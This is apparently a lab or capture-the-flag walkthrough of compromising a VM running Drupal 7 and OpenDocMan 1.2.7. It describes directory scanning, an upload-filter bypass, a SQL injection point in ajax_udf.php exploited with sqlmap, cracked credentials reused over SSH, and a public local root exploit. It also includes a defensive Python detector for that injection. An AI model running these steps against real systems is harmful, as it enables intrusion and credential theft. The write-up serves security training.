# Environment setup
The download is a VirtualBox machine, but I prefer VMware because it is easier to use.
So a conversion is needed; tutorial: https://blog.csdn.net/qq_30054403/article/details/123451969
NAT mode, IP address: 192.168.174.129
# Penetration process
# Initial information gathering
Open ports:

```text
22/tcp open ssh
80/tcp open http
6667/tcp open irc
```
```text
[01:36:02] 301 - 325B - /jabc/includes -> http://192.168.174.129/jabc/includes/
[01:36:03] 200 - 1KB - /jabc/includes/
[01:36:04] 404 - 8KB - /jabc/index.php/login/
[01:36:05] 200 - 117KB - /jabc/includes/bootstrap.inc
[01:36:05] 200 - 1KB - /jabc/install.php
[01:36:05] 200 - 1KB - /jabc/install.php?profile=default
[01:36:12] 301 - 321B - /jabc/misc -> http://192.168.174.129/jabc/misc/
[01:36:13] 301 - 324B - /jabc/modules -> http://192.168.174.129/jabc/modules/
[01:36:13] 200 - 853B - /jabc/modules/
[01:36:23] 200 - 278B - /jabc/profiles/testing/testing.info
[01:36:23] 301 - 325B - /jabc/profiles -> http://192.168.174.129/jabc/profiles/
[01:36:23] 200 - 743B - /jabc/profiles/standard/standard.info
[01:36:23] 200 - 271B - /jabc/profiles/minimal/minimal.info
[01:36:26] 200 - 649B - /jabc/robots.txt
[01:36:26] 301 - 324B - /jabc/scripts -> http://192.168.174.129/jabc/scripts/
[01:36:26] 200 - 461B - /jabc/scripts/
[01:36:30] 301 - 322B - /jabc/sites -> http://192.168.174.129/jabc/sites/
[01:36:38] 301 - 326B - /jabc/templates -> http://192.168.174.129/jabc/templates/
[01:36:38] 200 - 471B - /jabc/templates/
[01:36:40] 301 - 323B - /jabc/themes -> http://192.168.174.129/jabc/themes/
[01:36:40] 200 - 535B - /jabc/themes/
[01:36:43] 403 - 4KB - /jabc/update.php
[01:36:55] 200 - 42B - /jabc/xmlrpc.php
```
Contents of /jabc/robots.txt:

```text
User-agent: *
Crawl-delay: 10
# Directories
Disallow: /includes/
Disallow: /misc/
Disallow: /modules/
Disallow: /profiles/
Disallow: /scripts/
Disallow: /themes/
# Files
Disallow: /CHANGELOG.txt
Disallow: /cron.php
Disallow: /INSTALL.mysql.txt
Disallow: /INSTALL.pgsql.txt
Disallow: /INSTALL.sqlite.txt
Disallow: /install.php
Disallow: /INSTALL.txt
Disallow: /LICENSE.txt
Disallow: /MAINTAINERS.txt
Disallow: /update.php
Disallow: /UPGRADE.txt
Disallow: /xmlrpc.php
# Paths (clean URLs)
Disallow: /admin/
Disallow: /comment/reply/
Disallow: /filter/tips/
Disallow: /node/add/
Disallow: /search/
Disallow: /user/register/
Disallow: /user/password/
Disallow: /user/login/
Disallow: /user/logout/
# Paths (no clean URLs)
Disallow: /?q=admin/
Disallow: /?q=comment/reply/
Disallow: /?q=filter/tips/
Disallow: /?q=node/add/
Disallow: /?q=search/
Disallow: /?q=user/password/
Disallow: /?q=user/register/
Disallow: /?q=user/login/
Disallow: /?q=user/logout/
```
```text
http://192.168.174.129/jabc/ [200 OK] Apache[2.4.7], Content-Language[en], Country[RESERVED][ZZ], Drupal, HTTPServer[Ubuntu Linux][Apache/2.4.7 (Ubuntu)], IP[192.168.174.129], JQuery, MetaGenerator[Drupal 7 (http://drupal.org)], PHP[5.5.9-1ubuntu4.14], Script[text/javascript], Title[JABC | Just Another Bioware Company], UncommonHeaders[x-generator], X-Powered-By[PHP/5.5.9-1ubuntu4.14]
```

Browsing through the pages, I saw a hint in black text pointing to the /jabcd0cs/ directory, with the account guest/guest.
# File upload (dead end)
Inside there is an upload point. I tried uploading and found that file types are filtered.
Tried to bypass it: changing the MIME type to PNG still did not get through; changing the MIME type to GIF and adding a GIF file header, the upload succeeded! Then I looked for somewhere it would be parsed as PHP and found nothing. GG.
# CMS vulnerabilities
Drupal 7 has many vulnerabilities, and they are very version-specific; I tried two with no result.

OpenDocMan v1.2.7: a quick search shows it has a known vulnerability, a SQL injection: `searchsploit -m 32075.txt`. Injection point: http://192.168.174.129/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user*
Used sqlmap to dump the database; be sure to add `--level 5` and raise the test level, otherwise it misses the injection!
Got the account credentials:
```text
+----+--------------------+-------------+----------------------------------+----------+-----------+------------+------------+---------------+
| id | Email              | phone       | password                         | username | last_name | department | first_name | pw_reset_code |
+----+--------------------+-------------+----------------------------------+----------+-----------+------------+------------+---------------+
| 1  | [email protected]  | 5555551212  | b78aae356709f8c31118ea613980954b | webmin   | min       | 2          | web        | <blank>       |
| 2  | [email protected]  | 555 5555555 | 084e0343a0486ff05530df6c705c8bb4 | guest    | guest     | 2          | guest      | NULL          |
+----+--------------------+-------------+----------------------------------+----------+-----------+------------+------------+---------------+
```
Looking up the hash gives the credentials webmin/webmin1980. Now we have a username/password pair that is likely reused elsewhere, so we try it over SSH, and it logs in.
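As an added defender-side example (not part of this write-up), the following Python script scans Apache access-log lines for the injection pattern above: requests to ajax_udf.php whose add_value parameter is not a plain identifier or carries SQL syntax, plus sqlmap's default User-Agent. The log lines are constructed samples; the timestamps, byte counts and the `sqlmap/1.7` agent string are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed Apache combined-log lines (sample data, not captured from the target).
# Line 2 carries a sqlmap User-Agent; lines 2 and 3 carry SQL syntax in add_value.
SAMPLE_LOG = """\
192.168.174.1 - - [10/Mar/2023:01:40:12 +0000] "GET /jabcd0cs/ajax_udf.php?q=1&add_value=odm_user HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.168.174.1 - - [10/Mar/2023:01:40:15 +0000] "GET /jabcd0cs/ajax_udf.php?q=1&add_value=odm_user%20UNION%20ALL%20SELECT%20NULL,NULL%20--%20- HTTP/1.1" 200 1034 "-" "sqlmap/1.7"
192.168.174.1 - - [10/Mar/2023:01:40:16 +0000] "GET /jabcd0cs/ajax_udf.php?q=1&add_value=odm_user'%20AND%20SLEEP(5)--%20 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.168.174.1 - - [10/Mar/2023:01:41:02 +0000] "GET /jabc/ HTTP/1.1" 200 8192 "-" "Mozilla/5.0"
"""

# Apache combined log format: ip ident user [time] "method path proto" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# add_value is meant to hold a table/field name, so anything beyond [A-Za-z0-9_] is suspect.
IDENT_RE = re.compile(r"^[A-Za-z0-9_]+$")
# SQL tokens that have no business in that parameter.
SQLI_RE = re.compile(r"""(?i)(\bunion\b|\bselect\b|\bsleep\s*\(|\bbenchmark\s*\(|--|/\*|['"])""")

def inspect_line(line):
    """Return the reasons one log line looks like an attack on ajax_udf.php ([] if clean)."""
    m = LOG_RE.match(line)
    if not m:
        return ["unparsable log line"]
    reasons = []
    if "sqlmap" in m.group("ua").lower():
        reasons.append("sqlmap user-agent")
    url = urlsplit(m.group("path"))
    if not url.path.endswith("/ajax_udf.php"):
        return reasons
    # parse_qs percent-decodes, so encoded quotes and spaces are inspected in the clear.
    for value in parse_qs(url.query, keep_blank_values=True).get("add_value", []):
        if not IDENT_RE.match(value):
            reasons.append("add_value is not a plain identifier: %r" % value)
        if SQLI_RE.search(value):
            reasons.append("SQL syntax in add_value")
    return reasons

def scan_log(text):
    """Map 1-based line numbers to their reasons, keeping only lines that raised any."""
    hits = {}
    for n, line in enumerate(text.splitlines(), 1):
        reasons = inspect_line(line)
        if reasons:
            hits[n] = reasons
    return hits
```

Running `scan_log(SAMPLE_LOG)` flags lines 2 and 3 only; the identifier check catches the time-based probe even though its User-Agent looks like a browser.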
# Privilege escalation
With webmin's shell, I tried to escalate; the account has no sudo rights.
There is a compressed archive named post in the home directory. Other write-ups say it is hydra, meant for brute-forcing the local database and then escalating from there.
That is a long detour. Just search for a local privilege escalation exploit, compile it, upload it, and that's it, folks.
```text
┌──(root㉿kali)-[~]
└─# searchsploit -m 37292.c
```

Privilege escalation done.
# Summary
My approach was not clear enough: I spent too long poking at the CMS, made poor use of the information gathered, and could not find the vulnerability efficiently.
My knowledge of using privilege escalation scripts is roughly zero; I just tried them one after another. I need a deeper understanding of this area.